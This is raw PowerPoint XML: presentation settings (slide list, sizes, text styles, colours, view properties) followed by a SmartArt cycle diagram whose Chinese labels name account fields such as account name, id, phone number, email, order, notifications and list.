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57"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId58"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="284" r:id="rId5"/>
    <p:sldId id="326" r:id="rId6"/>
    <p:sldId id="385" r:id="rId7"/>
    <p:sldId id="373" r:id="rId8"/>
    <p:sldId id="384" r:id="rId9"/>
    <p:sldId id="375" r:id="rId10"/>
    <p:sldId id="354" r:id="rId11"/>
    <p:sldId id="352" r:id="rId12"/>
    <p:sldId id="353" r:id="rId13"/>
    <p:sldId id="355" r:id="rId14"/>
    <p:sldId id="356" r:id="rId15"/>
    <p:sldId id="392" r:id="rId16"/>
    <p:sldId id="393" r:id="rId17"/>
    <p:sldId id="357" r:id="rId18"/>
    <p:sldId id="359" r:id="rId19"/>
    <p:sldId id="358" r:id="rId20"/>
    <p:sldId id="360" r:id="rId21"/>
    <p:sldId id="362" r:id="rId22"/>
    <p:sldId id="339" r:id="rId23"/>
    <p:sldId id="338" r:id="rId24"/>
    <p:sldId id="334" r:id="rId25"/>
    <p:sldId id="337" r:id="rId26"/>
    <p:sldId id="335" r:id="rId27"/>
    <p:sldId id="336" r:id="rId28"/>
    <p:sldId id="333" r:id="rId29"/>
    <p:sldId id="341" r:id="rId30"/>
    <p:sldId id="351" r:id="rId31"/>
    <p:sldId id="363" r:id="rId32"/>
    <p:sldId id="342" r:id="rId33"/>
    <p:sldId id="382" r:id="rId34"/>
    <p:sldId id="376" r:id="rId35"/>
    <p:sldId id="379" r:id="rId36"/>
    <p:sldId id="380" r:id="rId37"/>
    <p:sldId id="369" r:id="rId38"/>
    <p:sldId id="378" r:id="rId39"/>
    <p:sldId id="370" r:id="rId40"/>
    <p:sldId id="371" r:id="rId41"/>
    <p:sldId id="390" r:id="rId42"/>
    <p:sldId id="330" r:id="rId43"/>
    <p:sldId id="377" r:id="rId44"/>
    <p:sldId id="349" r:id="rId45"/>
    <p:sldId id="386" r:id="rId46"/>
    <p:sldId id="387" r:id="rId47"/>
    <p:sldId id="388" r:id="rId48"/>
    <p:sldId id="389" r:id="rId49"/>
    <p:sldId id="344" r:id="rId50"/>
    <p:sldId id="346" r:id="rId51"/>
    <p:sldId id="345" r:id="rId52"/>
    <p:sldId id="383" r:id="rId53"/>
    <p:sldId id="348" r:id="rId54"/>
    <p:sldId id="347" r:id="rId55"/>
    <p:sldId id="283" r:id="rId56"/>
  </p:sldIdLst>
  <p:sldSz cx="9753600" cy="7315200"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="zh-CN"/>
    </a:defPPr>
    <a:lvl1pPr marL="0" algn="l" defTabSz="9752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650" algn="l" defTabSz="9752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299" algn="l" defTabSz="9752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949" algn="l" defTabSz="9752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598" algn="l" defTabSz="9752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8248" algn="l" defTabSz="9752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897" algn="l" defTabSz="9752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3547" algn="l" defTabSz="9752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1196" algn="l" defTabSz="9752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30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A0A4"/>
    <a:srgbClr val="7D9CA3"/>
    <a:srgbClr val="87A4AB"/>
    <a:srgbClr val="A0B7BC"/>
    <a:srgbClr val="57767B"/>
    <a:srgbClr val="516E73"/>
    <a:srgbClr val="466064"/>
    <a:srgbClr val="B1CED3"/>
    <a:srgbClr val="CED9DC"/>
    <a:srgbClr val="D0D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8" autoAdjust="0"/>
    <p:restoredTop sz="86553" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="272" y="-528"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2304"/>
        <p:guide pos="3072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8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commentAuthors" Target="commentAuthor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CBF375-7988-41D9-86E5-2B966C013A6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401934DC-A447-4E9D-8A2F-0C23D8AC7234}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>帐户名</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFDC7330-613C-4E79-8EBF-8E7ECF9E96FC}" type="parTrans" cxnId="{5AF3D877-26B2-4A7E-8AAA-F9CCA2CDA93A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D60A10C-B325-45E2-8D04-657DDED4D318}" type="sibTrans" cxnId="{5AF3D877-26B2-4A7E-8AAA-F9CCA2CDA93A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2628547F-A1CA-4A16-AB22-68B9710291A9}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>订单</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3C7FA13-D72F-4879-99B9-EB2C9ACA5663}" type="parTrans" cxnId="{FE2A7BBE-2DB8-4504-9A47-A7060A08702C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D65F60BB-7898-4C7A-ABB7-0C58C43AAE44}" type="sibTrans" cxnId="{FE2A7BBE-2DB8-4504-9A47-A7060A08702C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39FD9775-B92E-4EE8-A4FD-0C99D0DD00A3}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>消息通知</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94CA8666-1204-4130-8D4F-D9C8020B58AB}" type="parTrans" cxnId="{968B8B62-7C20-483E-9983-5DDA368F6E59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65F7C055-E17A-4F3F-AE14-4ABADEA0963B}" type="sibTrans" cxnId="{968B8B62-7C20-483E-9983-5DDA368F6E59}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F61D691F-D765-4A59-8B2B-36329AA6E973}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>手机号</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89BB4DE8-AEEA-4BB4-94E8-8BD62502131A}" type="parTrans" cxnId="{77AACBAE-EE3B-4B29-8D21-A17C0E0DE3CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DA37B89-3B60-4B82-A14D-E8CFDE78395C}" type="sibTrans" cxnId="{77AACBAE-EE3B-4B29-8D21-A17C0E0DE3CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5A555E6-A22D-4BDE-ADB9-19C408921F67}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>邮箱</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{509EA31B-734B-457C-BBEB-6EF754342603}" type="parTrans" cxnId="{08802141-0817-4E20-B2E9-DA7BE271BCF2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E166C75-4F59-483A-8BBB-ACBAE8E8CD60}" type="sibTrans" cxnId="{08802141-0817-4E20-B2E9-DA7BE271BCF2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64317DB5-0CB4-400F-813B-6E0544B1F62D}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>名单</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA9CF6E2-1E3A-4E7C-97AE-D6BDE00586FB}" type="parTrans" cxnId="{305CBD1F-E7C8-4E13-9C2C-EFF366E4A6B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{137FE04A-5DE7-47E8-9BB5-1B70F9FCD9A7}" type="sibTrans" cxnId="{305CBD1F-E7C8-4E13-9C2C-EFF366E4A6B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACFCAD90-C360-414B-916B-9C9D664942D9}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            <a:t>id</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{872CC026-E253-49EC-A9BA-7142A9C3AD8B}" type="parTrans" cxnId="{8F016CAB-13C0-4F47-97D8-91ED90B5C638}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F889DD6-ABA2-449E-B90B-79F48FFE231A}" type="sibTrans" cxnId="{8F016CAB-13C0-4F47-97D8-91ED90B5C638}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="compositeShape" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DEB8CE9-8E9A-419A-B7CF-0359D290A74D}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="wedge1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F537CC9-4970-4416-94A2-06BCE052438D}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy1a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9DDF6065-8515-4E3C-99ED-F1E2582B16EA}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy1b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8E7B7568-A305-4178-B001-39E2FE0602E6}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D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5117AF-691A-4244-9B32-63942D9F1899}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="wedge2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5BFDA040-6203-444E-AD9F-4C7600D13812}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy2a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2DCA58B-F0B7-49F1-85D0-468203E4BECA}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy2b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1320394-93FB-4B7B-83CD-6624DC5D8519}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D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19E279-6D5A-4A54-87E6-D345D788E1AC}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="wedge3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53939A57-58F7-4663-A667-D09E94DC4359}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy3a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF977A51-127C-4DC4-9236-1B2EB7CE8742}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy3b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6317062-5B51-4FA3-BF9D-B15B29B330DF}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D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B4EF1A-92C2-42DC-AEAC-0ACDD620F72E}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="wedge4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1E5E2EB-7A38-40C7-98D2-5FB200D03374}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy4a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3C325FC-04CD-4FF3-834D-8E9524481AE2}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy4b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE766A88-0B2A-4BCC-BB66-27CC269C1127}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D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B1C6D5-9295-497C-9AE9-851C8430DE8C}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="wedge5" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C0951D6-B7DB-474E-B1FD-3D388636F111}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy5a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{32DAC9DF-280E-4EF6-9EC5-1A28A639B7B5}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy5b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{812B6C51-308F-42B0-838F-594E63465799}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D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3C9DFB-BBFF-4ABF-98A9-3FED709CB8C5}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="wedge6" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="7"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{936AAB34-7065-44EB-81EE-80354A99163D}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy6a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D152899-987C-4B74-8BEA-D24CEDE6A2C3}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy6b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9A3CB984-5310-4031-B503-165D8B8A8F4B}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D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0E6F7D-692E-456B-80C1-C98A215A9660}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="wedge7" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="7"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8FF528D9-C741-4651-AC78-12039CD05A75}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy7a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AF67D5C6-8F6F-4D8D-927A-196DC0748257}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" presName="dummy7b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9A5A383-6545-4C0B-B89D-C9F93BE5FAE2}" type="pres">
      <dgm:prSet presAssocID="{2BCBF375-7988-41D9-86E5-2B966C013A6D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827485-9CF7-433F-85D2-84AAFECF8CB9}" type="pres">
      <dgm:prSet presAssocID="{7D60A10C-B325-45E2-8D04-657DDED4D318}" presName="arrowWedge1" presStyleLbl="fgSibTrans2D1" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{37FF4C0C-07CA-4360-9CCC-0839560305D4}" type="pres">
      <dgm:prSet presAssocID="{3F889DD6-ABA2-449E-B90B-79F48FFE231A}" presName="arrowWedge2" presStyleLbl="fgSibTrans2D1" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68A1BF9D-4FA0-4920-ABA5-E78B58FC6388}" type="pres">
      <dgm:prSet presAssocID="{6DA37B89-3B60-4B82-A14D-E8CFDE78395C}" presName="arrowWedge3" presStyleLbl="fgSibTrans2D1" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{126824D2-FA2A-48C6-B206-F59F5E616C9D}" type="pres">
      <dgm:prSet presAssocID="{2E166C75-4F59-483A-8BBB-ACBAE8E8CD60}" presName="arrowWedge4" presStyleLbl="fgSibTrans2D1" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C10B1A54-E60C-400B-BA39-66318D41FE97}" type="pres">
      <dgm:prSet presAssocID="{D65F60BB-7898-4C7A-ABB7-0C58C43AAE44}" presName="arrowWedge5" presStyleLbl="fgSibTrans2D1" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC00AA75-14DD-4E9F-B12B-A0DBFA93796E}" type="pres">
      <dgm:prSet presAssocID="{65F7C055-E17A-4F3F-AE14-4ABADEA0963B}" presName="arrowWedge6" presStyleLbl="fgSibTrans2D1" presStyleIdx="5" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{10EB642D-F402-426A-860E-7A6ED20615ED}" type="pres">
      <dgm:prSet presAssocID="{137FE04A-5DE7-47E8-9BB5-1B70F9FCD9A7}" presName="arrowWedge7" presStyleLbl="fgSibTrans2D1" presStyleIdx="6" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{305CBD1F-E7C8-4E13-9C2C-EFF366E4A6B5}" srcId="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" destId="{64317DB5-0CB4-400F-813B-6E0544B1F62D}" srcOrd="6" destOrd="0" parTransId="{FA9CF6E2-1E3A-4E7C-97AE-D6BDE00586FB}" sibTransId="{137FE04A-5DE7-47E8-9BB5-1B70F9FCD9A7}"/>
    <dgm:cxn modelId="{5679BB64-4460-4489-96D3-6730EE849C6B}" type="presOf" srcId="{401934DC-A447-4E9D-8A2F-0C23D8AC7234}" destId="{8E7B7568-A305-4178-B001-39E2FE0602E6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{DBC30093-0EE0-4CC5-B444-EB764573ED58}" type="presOf" srcId="{B5A555E6-A22D-4BDE-ADB9-19C408921F67}" destId="{BE766A88-0B2A-4BCC-BB66-27CC269C1127}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{EC1FD2D1-72B5-4090-9BFD-65DB729CB05C}" type="presOf" srcId="{39FD9775-B92E-4EE8-A4FD-0C99D0DD00A3}" destId="{9A3CB984-5310-4031-B503-165D8B8A8F4B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{9A46B890-890C-4F45-8339-C587AF908650}" type="presOf" srcId="{39FD9775-B92E-4EE8-A4FD-0C99D0DD00A3}" destId="{483C9DFB-BBFF-4ABF-98A9-3FED709CB8C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{70182C4F-6256-44CE-B1A2-CF67CB916A4E}" type="presOf" srcId="{64317DB5-0CB4-400F-813B-6E0544B1F62D}" destId="{B9A5A383-6545-4C0B-B89D-C9F93BE5FAE2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{5AF3D877-26B2-4A7E-8AAA-F9CCA2CDA93A}" srcId="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" destId="{401934DC-A447-4E9D-8A2F-0C23D8AC7234}" srcOrd="0" destOrd="0" parTransId="{CFDC7330-613C-4E79-8EBF-8E7ECF9E96FC}" sibTransId="{7D60A10C-B325-45E2-8D04-657DDED4D318}"/>
    <dgm:cxn modelId="{FE2A7BBE-2DB8-4504-9A47-A7060A08702C}" srcId="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" destId="{2628547F-A1CA-4A16-AB22-68B9710291A9}" srcOrd="4" destOrd="0" parTransId="{A3C7FA13-D72F-4879-99B9-EB2C9ACA5663}" sibTransId="{D65F60BB-7898-4C7A-ABB7-0C58C43AAE44}"/>
    <dgm:cxn modelId="{A809848D-5DBA-4461-B0F1-AC597713FD69}" type="presOf" srcId="{64317DB5-0CB4-400F-813B-6E0544B1F62D}" destId="{C50E6F7D-692E-456B-80C1-C98A215A9660}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{7ED6CA12-FD1B-4687-8DD7-7B17D9C0ECA3}" type="presOf" srcId="{F61D691F-D765-4A59-8B2B-36329AA6E973}" destId="{F6317062-5B51-4FA3-BF9D-B15B29B330DF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{599C0322-ED59-452C-A085-2DDE5493493B}" type="presOf" srcId="{2628547F-A1CA-4A16-AB22-68B9710291A9}" destId="{812B6C51-308F-42B0-838F-594E63465799}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{8F016CAB-13C0-4F47-97D8-91ED90B5C638}" srcId="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" destId="{ACFCAD90-C360-414B-916B-9C9D664942D9}" srcOrd="1" destOrd="0" parTransId="{872CC026-E253-49EC-A9BA-7142A9C3AD8B}" sibTransId="{3F889DD6-ABA2-449E-B90B-79F48FFE231A}"/>
    <dgm:cxn modelId="{45596B7F-33D6-4177-AEB2-D9DC8DF6360F}" type="presOf" srcId="{401934DC-A447-4E9D-8A2F-0C23D8AC7234}" destId="{5DEB8CE9-8E9A-419A-B7CF-0359D290A74D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{B0255351-1222-4435-8387-3806075E6FC1}" type="presOf" srcId="{B5A555E6-A22D-4BDE-ADB9-19C408921F67}" destId="{E5B4EF1A-92C2-42DC-AEAC-0ACDD620F72E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{78C7437B-D10B-452E-B422-DE42539C028B}" type="presOf" srcId="{ACFCAD90-C360-414B-916B-9C9D664942D9}" destId="{585117AF-691A-4244-9B32-63942D9F1899}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{77AACBAE-EE3B-4B29-8D21-A17C0E0DE3CA}" srcId="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" destId="{F61D691F-D765-4A59-8B2B-36329AA6E973}" srcOrd="2" destOrd="0" parTransId="{89BB4DE8-AEEA-4BB4-94E8-8BD62502131A}" sibTransId="{6DA37B89-3B60-4B82-A14D-E8CFDE78395C}"/>
